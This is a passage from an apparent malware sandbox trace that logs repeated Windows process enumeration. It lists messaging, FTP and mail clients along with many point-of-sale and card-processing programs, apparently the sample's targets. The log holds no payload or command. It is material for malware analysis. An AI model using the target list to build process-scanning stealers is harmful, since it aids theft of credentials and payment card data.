(in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0242.846] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0242.848] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0242.849] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0242.851] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0242.853] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0242.855] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0242.908] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0242.910] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0242.912] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0242.914] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0242.916] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0242.922] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0242.924] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0242.927] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0242.929] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0242.931] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0242.937] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0242.939] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0242.941] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0242.943] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0242.945] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0242.947] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0242.968] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0242.970] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0242.973] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0242.975] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0242.977] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0242.982] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0242.985] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0242.987] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.989] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.991] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.993] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0242.994] CloseHandle (hObject=0x1b08) returned 1 [0242.994] Sleep (dwMilliseconds=0x64) [0243.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0243.123] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.125] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.127] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.128] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.129] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.131] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.132] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.138] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.140] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.141] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.143] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.146] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.148] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.149] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.150] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.202] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.203] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.205] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.206] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0243.207] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0243.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.211] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0243.247] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0243.249] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0243.251] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0243.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0243.261] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0243.265] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0243.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0243.269] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0243.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0243.272] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0243.273] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0243.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0243.307] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0243.309] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0243.311] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0243.312] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0243.313] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0243.315] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0243.331] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0243.333] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 